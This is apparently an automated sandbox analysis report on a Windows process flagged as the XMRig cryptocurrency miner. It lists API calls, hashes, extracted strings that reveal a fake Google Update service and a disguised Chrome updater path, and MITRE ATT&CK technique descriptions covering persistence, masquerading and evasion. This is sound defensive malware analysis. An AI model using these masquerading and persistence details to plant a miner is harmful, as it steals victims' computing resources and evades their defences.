Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3836485970.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.1503060227.0000000001A07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3836485970.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.1503060227.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.8%
Total number of Nodes:	899
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAddAtom.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: 76089f1c8a6a43e448fdd7d9bb7fd510ddac4a8738435975e1404729ef16ef08
Instruction ID: bdb90c4048b96c94c325258b529c756cdeb0dde265359f3d0d2f47c381bdd361
Opcode Fuzzy Hash: 76089f1c8a6a43e448fdd7d9bb7fd510ddac4a8738435975e1404729ef16ef08
Instruction Fuzzy Hash: C1F0AFB2608B408AEA12DF62F85179A77A5F38C7C0F009919BBC853735DB3CC190CB40

Non-executed Functions

Function 0000000140003250 Relevance: 152.6, APIs: 62, Strings: 24, Instructions: 2085COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00000001400033C2
memset.MSVCRT ref: 00000001400034EE
wcslen.MSVCRT ref: 0000000140003557
_wcsnicmp.MSVCRT ref: 0000000140003589
wcslen.MSVCRT ref: 0000000140003599
wcscpy.MSVCRT ref: 000000014000367E
wcscat.MSVCRT ref: 000000014000368D
memset.MSVCRT ref: 000000014000369E
wcscpy.MSVCRT ref: 0000000140003701
wcscat.MSVCRT ref: 0000000140003710
memset.MSVCRT ref: 0000000140003724

Strings

ATI, xrefs: 000000014000457F
\BaseNamedObjects\pyuadpzaqmicymrm, xrefs: 0000000140004B54
NVIDIA, xrefs: 00000001400044D7
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 0000000140003F8C, 00000001400061FA
AMD, xrefs: 000000014000452B
Advanced Micro Devices, xrefs: 000000014000434A
ImagePath, xrefs: 0000000140004FF5
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 0000000140003854
, xrefs: 00000001400047B7
PROGRAMDATA=, xrefs: 00000001400038E5, 0000000140003B84
\BaseNamedObjects\bgjijzsmuwcxulxiguezflvb, xrefs: 0000000140005168
\cmd.exe, xrefs: 0000000140003706
\BaseNamedObjects\nxhbageuwj, xrefs: 00000001400033B8
SYSTEMROOT=, xrefs: 0000000140003550, 0000000140003569
\System32, xrefs: 0000000140003683
\reg.exe, xrefs: 0000000140003D9C
Start, xrefs: 0000000140005D07
\GoogleUP\Chrome\Updater.exe, xrefs: 0000000140003D13
\sc.exe, xrefs: 0000000140003E12
\??\, xrefs: 0000000140004977
\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineK, xrefs: 0000000140004F08, 0000000140005FC9
\??\, xrefs: 0000000140004723
ProviderName, xrefs: 0000000140004036
, xrefs: 0000000140005BB6

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\bgjijzsmuwcxulxiguezflvb$\BaseNamedObjects\nxhbageuwj$\BaseNamedObjects\pyuadpzaqmicymrm$\GoogleUP\Chrome\Updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineK$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
API String ID: 3506639089-2644899857
Opcode ID: 462d5c35c254b6e6e329c43571361d1885cde8b1f7dc4672cf0a73e176627a72
Instruction ID: 898a1ec7dd7c9a1f843ae3b3e27844a62abb68b8b1eab08d8124d85d7b0156d3
Opcode Fuzzy Hash: 462d5c35c254b6e6e329c43571361d1885cde8b1f7dc4672cf0a73e176627a72
Instruction Fuzzy Hash: 9B5328F1924BC198F723CB3AB8567E56360BB9E3C4F445316BB84676B2EB794285C304

Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0000000140002810
wcsncmp.MSVCRT ref: 00000001400029E4
memset.MSVCRT ref: 0000000140002AAC
wcscpy.MSVCRT ref: 0000000140002B15
wcscat.MSVCRT ref: 0000000140002B20
wcslen.MSVCRT ref: 0000000140002B28
wcslen.MSVCRT ref: 0000000140002B40
wcslen.MSVCRT ref: 0000000140002BA0
wcslen.MSVCRT ref: 0000000140002BF2

Strings

X, xrefs: 0000000140002D83
\BaseNamedObjects\pyuadpzaqmicymrm, xrefs: 00000001400027D8
`, xrefs: 0000000140002D9B
0, xrefs: 00000001400029E9

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: wcslen$memset$wcscatwcscpywcsncmp
String ID: 0$X$\BaseNamedObjects\pyuadpzaqmicymrm$`
API String ID: 780471329-1580679548
Opcode ID: 0fece43f2c9d093e6e7852c5209f4ad3c0577b89fc8ac1a1272a91f58e49894b
Instruction ID: 33c2791fdfb7acfbb72994536c831d49faf6fe367a90cb38570bcc0456ec6b28
Opcode Fuzzy Hash: 0fece43f2c9d093e6e7852c5209f4ad3c0577b89fc8ac1a1272a91f58e49894b
Instruction Fuzzy Hash: 971259B2618B8081E762CB16F8453EA77A4F789794F414215EBAC57BF5EF78C189C700

Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,0000000140001156), ref: 00000001400011A5
_amsg_exit.MSVCRT(?,?,?,0000000140001156), ref: 00000001400011CC
_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT(?,?,?,0000000140001156), ref: 000000014000132D

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: 7de2c24a8f347e5fd4d91491675bce44879358130808f9b76e4418a5deae7a7c
Instruction ID: e3af164a46801bbef262b6a8a4866c47f9f764d97e1d0cd31dd449a17f21abfe
Opcode Fuzzy Hash: 7de2c24a8f347e5fd4d91491675bce44879358130808f9b76e4418a5deae7a7c
Instruction Fuzzy Hash: 125101F1615A4089FA16EF27F9947EA27A5AB8C7D0F449125FB4E873B2DF3884958300

Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,0000000140007E60,0000000140007E60,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
VirtualProtect.KERNEL32(?,?,?,?,0000000140007E60,0000000140007E60,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
memcpy.MSVCRT ref: 0000000140001CE0
GetLastError.KERNEL32(?,?,?,?,0000000140007E60,0000000140007E60,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 0000000140001D17
Address %p has no image-section, xrefs: 0000000140001CF4
VirtualProtect failed with code 0x%x, xrefs: 0000000140001D29

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 5c19ba99cb17a5c14b4f0aee5c729743694d0a433284d8997bc5a6e9dcc910dc
Instruction ID: dbc0e2da05bf2c3a89b79fffe31c6fbcea3b7de8689d75b26f3b62d16219dede
Opcode Fuzzy Hash: 5c19ba99cb17a5c14b4f0aee5c729743694d0a433284d8997bc5a6e9dcc910dc
Instruction Fuzzy Hash: EA4132F1201A4486FA66DF57F884BE927A0E78DBC4F594126EF0E877B1DA38C586C700

Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002118
TlsGetValue.KERNEL32 ref: 000000014000214F
GetLastError.KERNEL32 ref: 0000000140002154
LeaveCriticalSection.KERNEL32 ref: 0000000140002212
free.MSVCRT ref: 0000000140002234
DeleteCriticalSection.KERNEL32 ref: 000000014000225D

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: ecb18f28d2fc064c8c53c547f1d5c3dd6483a84d749c5779d416b176c4c7f308
Instruction ID: e8bdacf4eb02e2a59da25aef411a4b4d42b8ba143c70b14f7e985be0f995cf45
Opcode Fuzzy Hash: ecb18f28d2fc064c8c53c547f1d5c3dd6483a84d749c5779d416b176c4c7f308
Instruction Fuzzy Hash: 5721C5B1305A1192FA2BDB53F9583E92364BB6CBD0F444121EF5A57AB4DB7AC986C300

Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 0000000140001E27

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 52d5f3ba70cb489d7231570eb63cb082461152ce201432c497bb03c287481398
Instruction ID: 14efb12bbfdc906c575b5089e05b766e9e136cadf9555c6ac2d0f502a7a0cf39
Opcode Fuzzy Hash: 52d5f3ba70cb489d7231570eb63cb082461152ce201432c497bb03c287481398
Instruction Fuzzy Hash: B7213AB1B0150546FA77DA2BB9903F91192ABCC7E4F258535FF5A873F5DE3888C28241

Function 00000001400066A0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00000001400067B7

Strings

\BaseNamedObjects\nxhbageuwj, xrefs: 00000001400066A8
4LKS, xrefs: 0000000140006842
4LKS, xrefs: 0000000140006882

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: malloc
String ID: 4LKS$4LKS$\BaseNamedObjects\nxhbageuwj
API String ID: 2803490479-2801315105
Opcode ID: 706b27a29d2211272e8bf79c91a6133ebf541f38acc5a330101aacfc88c54a8d
Instruction ID: 0eab507f58cb9398dd06e48625181e876ab213bccb99e558fa40a49dcbf2fc7e
Opcode Fuzzy Hash: 706b27a29d2211272e8bf79c91a6133ebf541f38acc5a330101aacfc88c54a8d
Instruction Fuzzy Hash: EB71DFB27106108BE766DF3AA5007AB37A6F38CBCCF044218FF4A677A4EA35D8419750

Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9

Strings

Unknown pseudo relocation protocol version %d., xrefs: 0000000140001B8B
Unknown pseudo relocation bit size %d., xrefs: 0000000140001B7B

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 29b5f7649223b639debc673dbc577166402efb3148e29585f866e316227fb468
Instruction ID: b0a880438633e6e7738b6d9490c96ba2f871785a947ed42b66bea03ac4dc0962
Opcode Fuzzy Hash: 29b5f7649223b639debc673dbc577166402efb3148e29585f866e316227fb468
Instruction Fuzzy Hash: CF5115B6B11544DAEB12CF67F840BD82761A759BE8F548211FB1D077B4DB38C586C700

Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 000000014000185A

Strings

Unknown error, xrefs: 0000000140001824
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 000000014000184D

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 06181811500d279f898bb3d1d973a30ed5c17e00530caced0ae13738c96592a1
Instruction ID: c2dc9c1181b2715590d4ae65fb46cc0501878cfa8faa1410d24192dfb8456c0d
Opcode Fuzzy Hash: 06181811500d279f898bb3d1d973a30ed5c17e00530caced0ae13738c96592a1
Instruction Fuzzy Hash: E8F06271A14A4482E612DB6AB9417E96361E75D7C1F509211FF4D676A1DF38D1828310

Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400021B2
TlsGetValue.KERNEL32 ref: 00000001400021EB
GetLastError.KERNEL32 ref: 00000001400021F0
LeaveCriticalSection.KERNEL32 ref: 000000014000226C

Memory Dump Source

Source File: 00000039.00000002.3836335953.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000039.00000002.3836305467.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836377986.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836401976.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000039.00000002.3836435707.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 8b6b9414b034da60bc3dd14abf8880e5b88272e86660b7ba09a9639fca2dfda9
Instruction ID: 3a3b6563ab8dd847e8e53ef11ead7c23a3cdc09fead5d49227a0bc687d82e2c0
Opcode Fuzzy Hash: 8b6b9414b034da60bc3dd14abf8880e5b88272e86660b7ba09a9639fca2dfda9
Instruction Fuzzy Hash: E901A4B5305A0192FA17DB53FD083D86264BB6CBD1F494021EF0953AB4DB758996C300

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
